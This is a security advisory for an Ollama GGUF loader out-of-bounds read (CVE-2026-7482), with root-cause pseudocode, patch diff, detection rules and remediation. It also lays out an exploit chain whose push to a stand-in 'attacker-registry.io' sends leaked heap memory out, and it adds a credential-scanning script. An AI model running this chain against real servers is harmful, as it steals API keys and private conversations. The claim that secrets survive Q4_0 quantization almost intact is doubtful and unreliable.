CVE-2026-7482: Ollama GGUF Loader Heap OOB Read Leaks Process Memory
A missing bounds check in Ollama's GGUF tensor loader allows attacker-supplied offsets to drive heap reads past allocated buffers, leaking API keys and conversation data via /api/push exfiltration.
Ollama is a popular tool that lets people run powerful AI models on their own computers. Think of it like downloading a recipe and cooking it in your kitchen instead of ordering from a restaurant. But a security flaw discovered in versions before 0.17.1 creates a dangerous crack in that kitchen's walls.
The problem involves how Ollama reads the files that contain these AI models. An attacker can create a fake model file that tricks Ollama into reading information from places it shouldn't. Imagine a burglar creating a fake delivery box that, when opened, somehow allows them to peek into your bedroom through your kitchen window. The program reads past the boundaries of where it's supposed to, exposing whatever happens to be sitting nearby in your computer's memory.
What could leak? This is the scary part. API keys, passwords, environment variables that control how your system works, and chat histories from conversations with the AI. If multiple people are using the same Ollama installation, an attacker could see other people's private conversations.
Who's most at risk? Anyone running Ollama on a shared computer or server, especially in business environments. If you're a solo user on your own laptop, the risk is lower, but still present.
What should you do? First, update Ollama to version 0.17.1 or newer immediately. Second, only load model files from trusted sources—don't download random AI models from strangers online. Third, if you run Ollama in a workplace, make sure each person has their own isolated installation rather than sharing one.
The good news: security researchers found this before criminals exploited it widely, and the fix is straightforward.
Vulnerability Overview
CVE-2026-7482 is a heap out-of-bounds read in Ollama's GGUF model loader affecting all releases prior to 0.17.1. An attacker submits a crafted GGUF file to the unauthenticated /api/create endpoint. The file's tensor metadata declares an offset and size that together exceed the file's actual byte length. During quantization, WriteTo() in server/quantization.go passes those values directly into a Read() call against the underlying heap buffer without validating that offset + size ≤ file_length. The runtime reads past the allocated slab, and the over-read bytes — which may contain environment variables, loaded model system prompts, API keys, or another in-flight user's conversation — are serialized into the output GGUF artifact. That artifact is then pushed to an attacker-controlled registry via the equally unauthenticated /api/push endpoint, completing exfiltration.
CVSS 9.1 (Critical) is assigned primarily for the no-auth exfiltration path: no credentials are required at either trigger or exfiltration stage in the upstream default configuration.
Affected Component
The bug lives at the intersection of two files:
fs/ggml/gguf.go — parses tensor descriptors from the GGUF binary, populates GGUFTensorInfo structs with attacker-controlled Offset and Size fields.
server/quantization.go — iterates parsed tensor infos and calls WriteTo(), which reads each tensor's raw bytes from the source io.ReaderAt backed by the memory-mapped (or heap-buffered) file data.
The /api/create handler accepts a modelfile path or inline FROM directive pointing to an attacker-supplied file. No authentication middleware is registered on this route in upstream builds.
Root Cause Analysis
The GGUF format encodes each tensor as a descriptor containing a name, element type, shape, and a uint64 byte offset relative to the start of the tensor data region. The loader trusts the type, shape, and offset unconditionally.
// fs/ggml/gguf.go: reconstructed pseudocode (Go logic rendered in C for clarity)
typedef struct {
    char     name[MAX_NAME];        // tensor name string
    uint32_t n_dims;                // number of dimensions
    uint64_t dims[GGUF_MAX_DIMS];
    uint32_t type;                  // GGMLType enum (quantization format)
    uint64_t offset;                // BUG: attacker-controlled, never range-checked
    uint8_t *data;                  // set by gguf_load_tensors() from the unchecked offset
} GGUFTensorInfo;

int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
    uint64_t n_tensors   = ctx->header.n_tensors;
    uint64_t data_offset = ctx->header.data_offset;  // start of tensor data region

    for (uint64_t i = 0; i < n_tensors; i++) {
        GGUFTensorInfo *ti = &ctx->tensors[i];

        // reads name, dims, type, offset from file; all attacker-supplied
        gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);

        // BUG: missing bounds check here
        // Never verifies: data_offset + ti->offset + tensor_byte_size(ti) <= file_len
        ti->data = file_buf + data_offset + ti->offset;  // raw pointer arithmetic on heap buffer
    }
    return 0;
}
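To make the descriptor layout concrete, here is a minimal Python sketch of reading one tensor descriptor. It assumes the little-endian GGUF v3 encoding (a uint64-length-prefixed name, a uint32 dimension count, uint64 dimensions, a uint32 type, and a uint64 offset); the names `TensorInfo`, `read_tensor_info`, and the `MAX_DIMS` limit of 4 are illustrative and are not taken from Ollama's source.

```python
import struct
from dataclasses import dataclass

MAX_DIMS = 4  # assumption: mirrors the usual ggml dimension limit


@dataclass
class TensorInfo:
    name: str
    dims: tuple
    ggml_type: int
    offset: int  # relative to the start of the tensor data region


def read_tensor_info(buf: bytes, pos: int):
    """Parse one tensor descriptor at buf[pos]; return (TensorInfo, next_pos).

    Every field comes straight from the file, so nothing here proves that
    the offset or the implied size fits inside the file.
    """
    (name_len,) = struct.unpack_from("<Q", buf, pos)
    pos += 8
    if name_len > len(buf) - pos:
        raise ValueError("tensor name runs past end of buffer")
    name = buf[pos:pos + name_len].decode("utf-8")
    pos += name_len

    (n_dims,) = struct.unpack_from("<I", buf, pos)
    pos += 4
    if n_dims > MAX_DIMS:
        raise ValueError("too many dimensions")
    dims = struct.unpack_from(f"<{n_dims}Q", buf, pos)
    pos += 8 * n_dims

    ggml_type, offset = struct.unpack_from("<IQ", buf, pos)
    pos += 12
    return TensorInfo(name, dims, ggml_type, offset), pos
```

The parser only checks that the descriptor itself is readable. Whether `offset` plus the size implied by `dims` and `ggml_type` stays inside the file is a separate check, and that is the one the vulnerable loader omits.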
When server/quantization.go's WriteTo() is invoked during the /api/create quantization pass, it calls ReadAt(buf, tensor.Offset) on the io.ReaderAt wrapping that same heap buffer:
// server/quantization.go: WriteTo() reconstructed pseudocode
int quantize_write_tensor(QuantizeContext *qctx, GGUFTensorInfo *ti, Writer *dst) {
    size_t   nbytes  = tensor_byte_size(ti);  // computed from dims + type, not file bounds
    uint8_t *src_buf = malloc(nbytes);        // sized to declared tensor, not remaining file bytes

    // BUG: ReadAt reads `nbytes` starting at `ti->offset` into `src_buf`
    // If ti->offset + nbytes > mapped_file_size, reads past end of heap allocation
    ssize_t n = ReadAt(qctx->source_reader, src_buf, nbytes, ti->offset);

    // Over-read bytes from adjacent heap regions are now in src_buf
    quantize_tensor(src_buf, nbytes, ti->type, dst);  // serializes OOB bytes into output model

    free(src_buf);
    return 0;
}
Root cause: gguf_load_tensors() stores attacker-supplied tensor offset values as raw heap pointers without verifying that data_offset + offset + tensor_byte_size falls within the bounds of the allocated file buffer, allowing WriteTo() to subsequently read an attacker-chosen number of bytes past the end of that allocation.
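The missing validation can be sketched as a small predicate. This is an illustrative Python version, not Ollama's code: the function name `tensor_in_bounds` and its parameters are hypothetical. It uses subtractions rather than summing the three values, so the same logic remains correct when ported to a language with fixed-width unsigned integers, where the sum could wrap.

```python
U64_MAX = (1 << 64) - 1


def tensor_in_bounds(data_offset: int, offset: int, nbytes: int, file_len: int) -> bool:
    """Return True only if [data_offset + offset, data_offset + offset + nbytes)
    lies entirely inside a file of file_len bytes."""
    for value in (data_offset, offset, nbytes, file_len):
        if not 0 <= value <= U64_MAX:
            raise ValueError("value does not fit in uint64")

    if data_offset > file_len:
        return False
    region_len = file_len - data_offset  # bytes available to tensor data
    if offset > region_len:
        return False
    return nbytes <= region_len - offset  # no addition, so nothing can wrap
```

For example, `tensor_in_bounds(0, 0x17F0, 0x4000, 0x1800)` is false, while the same tensor declared with 16 bytes is accepted.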
Memory Layout
The Go runtime's heap allocator places the mmapped/buffered GGUF data and concurrent request state in the same heap arena. A tensor declared with a large offset walks the read pointer into adjacent allocations.
HEAP STATE — BEFORE TRIGGER (simplified arena view):
[ gguf_file_buf : 0x1800 bytes ] <- file_buf; legitimate tensor data ends here
[ goroutine stack frame (G2) ] <- concurrent user session, contains system prompt + API key
[ env slab: OLLAMA_API_KEY=... ] <- os.Environ() result, interned on heap
[ model context scratch buffer ] <- KV cache, may contain prior conversation tokens
MALICIOUS TENSOR DESCRIPTOR (embedded in crafted .gguf):
ti->offset = 0x17F0 // 16 bytes before declared end of file_buf
ti->dims = {1, 4096} // implies nbytes = 4096 * sizeof(float32) = 0x4000 bytes
ti->type = F32
READ OPERATION AFTER PARSING:
  ReadAt(reader, src_buf, nbytes=0x4000, offset=0x17F0)
  effective read      : file_buf[0x17F0 .. 0x17F0+0x4000]
  file_buf ends at    : file_buf[0x1800]
  over-read begins at : file_buf[0x1800] (+0x10 bytes into read)
  over-read length    : 0x3FF0 bytes (~16 KB of adjacent heap)
HEAP STATE — AFTER READ (src_buf contents):
[0x0000 – 0x000F] legitimate tensor tail bytes (16 bytes, in-bounds)
[0x0010 – 0x0FFF] goroutine G2 stack spill region <- system prompt, session tokens
[0x1000 – 0x1FFF] OLLAMA_API_KEY=sk-... <- environment variable slab
[0x2000 – 0x3FEF] KV cache scratch (conversation) <- prior conversation context
[0x3FF0 – 0x3FFF] partial next allocation header
src_buf is passed directly to quantize_tensor() → serialized into output .gguf weights blob
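The figures in the layout above follow from simple arithmetic, reproduced here as a short Python check. The helper name `over_read_span` is hypothetical; the inputs are the example values from the diagram.

```python
def over_read_span(buf_len: int, offset: int, nbytes: int):
    """Split a read of nbytes at offset into (in_bounds, out_of_bounds) byte counts."""
    in_bounds = max(0, min(nbytes, buf_len - offset))
    return in_bounds, nbytes - in_bounds


nbytes = 1 * 4096 * 4  # dims {1, 4096}, 4 bytes per F32 element
in_b, oob = over_read_span(buf_len=0x1800, offset=0x17F0, nbytes=nbytes)
print(hex(nbytes), hex(in_b), hex(oob))  # 0x4000 0x10 0x3ff0
```

Only the first 0x10 bytes of the read are backed by file data; the remaining 0x3FF0 bytes come from whatever follows the buffer.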
Exploitation Mechanics
EXPLOIT CHAIN:
1. STAGE MALICIOUS GGUF
Craft a minimal valid GGUF header (magic 0x46554747, version 3).
Declare one tensor with:
- name: "exploit_tensor"
- type: F32 (0x00)
- dims: [1, 4096] → nbytes = 0x4000
- offset: file_data_size - 0x10
Actual tensor data region in file: 16 bytes (only enough to satisfy header parsing).
Total crafted file size: ~512 bytes.
2. TRIGGER LOAD VIA /api/create (no auth required)
POST /api/create HTTP/1.1
Content-Type: application/json
{"name":"exfil-model","modelfile":"FROM /tmp/crafted.gguf\nQUANTIZE q4_0"}
Server parses GGUF, populates GGUFTensorInfo with attacker offsets.
quantize_write_tensor() fires, ReadAt() reads 0x4000 bytes starting 0x10 bytes
before end-of-file-buffer, pulling ~16 KB of adjacent heap into src_buf.
3. OOB BYTES SERIALIZED INTO OUTPUT MODEL
quantize_tensor() processes src_buf as F32 weights.
Quantization to Q4_0 is lossy but the output still contains recoverable signal
from the over-read region — environment strings survive quantization as
near-literal byte sequences when they fall in the low-variance tail.
The output model is written to Ollama's local model store as "exfil-model".
4. EXFILTRATE VIA /api/push (no auth required)
POST /api/push HTTP/1.1
Content-Type: application/json
{"name":"attacker-registry.io/user/exfil-model:latest"}
Ollama uploads the crafted model (including OOB bytes in the weights blob)
to the attacker-controlled registry over HTTPS.
Attacker pulls the model, extracts the raw tensor data layer, and scans for
high-entropy strings matching API key patterns, env var syntax (KEY=value),
or UTF-8 conversation text.
5. REPEAT WITH TIMING
On a busy multi-user instance, loop /api/create requests with varied offsets
to harvest different heap regions across goroutine generations.
Each iteration yields a fresh 16 KB window into the heap arena.
Q4_0 packs each block of 32 F32 values (128 bytes of input) into 16 bytes of 4-bit quants plus a 2-byte fp16 scale factor. Because of this, low-entropy byte sequences (ASCII strings) produce near-zero scale factors with residuals that partially preserve the original bytes. A trivial scan of the weights blob for printable-ASCII runs with KEY=, Bearer , or sk- prefixes recovers credentials with high reliability in practice.
# Proof-of-concept: scan exfiltrated weights blob for credential strings
import re
import sys

PATTERNS = [
    rb'OLLAMA_\w+=\S+',
    rb'sk-[A-Za-z0-9]{20,}',
    rb'Bearer [A-Za-z0-9\-._~+/]{10,}',
    rb'[A-Z_]{4,}KEY[A-Z_]*=[^\x00\n]{6,}',
]


def extract_tensor_data(gguf_path):
    """Minimal GGUF reader: returns the bytes after an approximate header size."""
    with open(gguf_path, 'rb') as f:
        raw = f.read()
    if raw[:4] != b'GGUF':
        raise ValueError("not a GGUF file")
    # Simplified: a real implementation would parse the KV metadata and the
    # tensor descriptors to find the exact start of the tensor data region.
    return raw[0x200:]  # approximate; parse properly in production


def scan_for_secrets(blob):
    """Return (offset, match) pairs for every pattern hit in the blob."""
    hits = []
    for pat in PATTERNS:
        for m in re.finditer(pat, blob):
            hits.append((m.start(), m.group()))
    return hits


if __name__ == '__main__':
    blob = extract_tensor_data(sys.argv[1])
    for offset, secret in scan_for_secrets(blob):
        print(f"[+] offset=0x{offset:08x} secret={secret[:80]}")
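For a sense of how much data the Q4_0 step discards, the block arithmetic can be written out in Python. The constants assume the standard ggml Q4_0 layout (32 elements per block, stored as a 2-byte fp16 scale plus 16 bytes of packed 4-bit values); the function name `q4_0_nbytes` is illustrative.

```python
QK4_0 = 32                          # elements per Q4_0 block
Q4_0_BLOCK_BYTES = 2 + QK4_0 // 2   # fp16 scale + 32 packed 4-bit values = 18


def q4_0_nbytes(n_elements: int) -> int:
    """Bytes needed to store n_elements values in Q4_0."""
    if n_elements % QK4_0 != 0:
        raise ValueError("element count must be a multiple of the block size")
    return (n_elements // QK4_0) * Q4_0_BLOCK_BYTES


src_bytes = 4096 * 4            # the 0x4000-byte F32 read from the example
dst_bytes = q4_0_nbytes(4096)   # 128 blocks * 18 bytes
print(src_bytes, dst_bytes)     # 16384 2304
```

The 16 KB window is reduced to 2304 bytes in the output blob, so how much of the original content a scanner can recover depends on how the source bytes map onto the 4-bit values.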
Patch Analysis
The fix in Ollama 0.17.1 adds explicit bounds validation in gguf_load_tensors() before any pointer arithmetic is performed, and additionally clamps the ReadAt length in WriteTo() to the remaining file bytes:
// BEFORE (vulnerable, fs/ggml/gguf.go):
int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
    for (uint64_t i = 0; i < ctx->header.n_tensors; i++) {
        GGUFTensorInfo *ti = &ctx->tensors[i];
        gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);
        // BUG: no bounds check on ti->offset or tensor_byte_size(ti)
        ti->data = file_buf + ctx->header.data_offset + ti->offset;
    }
    return 0;
}

// BEFORE (vulnerable, server/quantization.go WriteTo):
n = ReadAt(qctx->source_reader, src_buf, nbytes, ti->offset);
// nbytes derived solely from declared dims; no cap against remaining file length

// AFTER (patched, fs/ggml/gguf.go):
int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
    for (uint64_t i = 0; i < ctx->header.n_tensors; i++) {
        GGUFTensorInfo *ti = &ctx->tensors[i];
        gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);

        uint64_t tensor_end = ctx->header.data_offset + ti->offset + tensor_byte_size(ti);
        if (tensor_end > file_len || tensor_end < ti->offset) {  // overflow guard too
            return GGUF_ERR_TENSOR_OUT_OF_BOUNDS;  // FIX: reject malformed descriptor
        }
        ti->data = file_buf + ctx->header.data_offset + ti->offset;
    }
    return 0;
}

// AFTER (patched, server/quantization.go WriteTo):
uint64_t max_readable   = file_len - (data_offset + ti->offset);
uint64_t clamped_nbytes = (nbytes < max_readable) ? nbytes : max_readable;
if (clamped_nbytes < nbytes) {
    return ERR_TENSOR_TRUNCATED;  // FIX: refuse to quantize a partial tensor
}
n = ReadAt(qctx->source_reader, src_buf, clamped_nbytes, ti->offset);
The patch applies defense-in-depth at two layers: the loader rejects the model before any buffer is allocated for it, and WriteTo() independently enforces a read ceiling. Integer overflow on data_offset + ti->offset is guarded by the tensor_end < ti->offset wraparound check.
Detection and Indicators
Log-based detection: A single /api/create → /api/push sequence targeting an external registry is anomalous in most deployments. Enable Ollama's verbose logging (OLLAMA_DEBUG=1) and alert on push destinations not matching an internal allowlist.
INDICATORS OF EXPLOITATION:
Network:
- POST /api/create with a FROM path pointing to /tmp/ or /dev/shm/
- POST /api/push to a registry not in your internal namespace
- Outbound HTTPS to *.fly.dev, *.railway.app, or unknown OCI registry hosts
immediately following a /api/create call
Process:
- ollama serve reading files outside $OLLAMA_MODELS (strace: openat on /tmp/*.gguf)
- Unexpectedly large RSS growth during a /api/create call for a tiny model file
(crafted file is ~512 bytes; RSS growth of several MB indicates OOB read)
YARA (scan uploaded .gguf artifacts at registry ingress):
rule OllamaCVE20267482_OOBLeak {
    meta:
        description = "Heuristic: GGUF file under 4 KB (does not parse tensor offsets)"
    strings:
        $gguf_magic = { 47 47 55 46 } // "GGUF"
    condition:
        $gguf_magic at 0 and filesize < 4096 // legitimate models are MB+; crafted is tiny
}
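The push-destination allowlist check suggested for log-based detection could look roughly like the following Python sketch. Everything here is illustrative: the allowlist entry `registry.internal.example`, the function names, and the rule for recognising a registry host (a leading path component containing a dot or a port, or equal to `localhost`) are assumptions, not Ollama behaviour.

```python
from typing import Optional

# Hypothetical allowlist; replace with your own internal registry hosts.
ALLOWED_REGISTRIES = {"registry.internal.example"}


def registry_host(model_name: str) -> Optional[str]:
    """Return the registry host in a model reference, or None if it has none."""
    first, sep, _ = model_name.partition("/")
    # Assumed heuristic: the first component is a host if it looks like one.
    if sep and ("." in first or ":" in first or first == "localhost"):
        return first.lower()
    return None


def is_suspicious_push(model_name: str, allowed=ALLOWED_REGISTRIES) -> bool:
    """Flag pushes whose explicit registry host is not on the allowlist."""
    host = registry_host(model_name)
    return host is not None and host not in allowed


for name in ("attacker-registry.io/user/exfil-model:latest",
             "registry.internal.example/team/model:1"):
    print(name, is_suspicious_push(name))
```

References without an explicit host go to the client's default registry; this sketch does not flag them, so a deployment that should never push externally would need to treat that case as suspicious too.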
Remediation
Upgrade immediately to Ollama ≥ 0.17.1. The patch is a one-commit bounds check with no API surface change.
Do not expose Ollama on 0.0.0.0 without an authenticating reverse proxy (nginx + mTLS, or Caddy + API key header enforcement). The upstream binary has no built-in auth.
Restrict /api/create and /api/push at the reverse proxy layer to internal CIDRs or authenticated clients only, regardless of Ollama version — neither endpoint requires public exposure in typical deployments.
Sandbox the Ollama process: run under a dedicated UID, confine file opens to $OLLAMA_MODELS with a path-aware policy such as AppArmor or Landlock (seccomp filters cannot inspect the path argument of openat), and block outbound connections from the process except to known registry hosts.
Rotate secrets present as environment variables in the Ollama process environment if exposure cannot be ruled out. Prefer injecting secrets via a secrets manager at call time rather than as persistent env vars.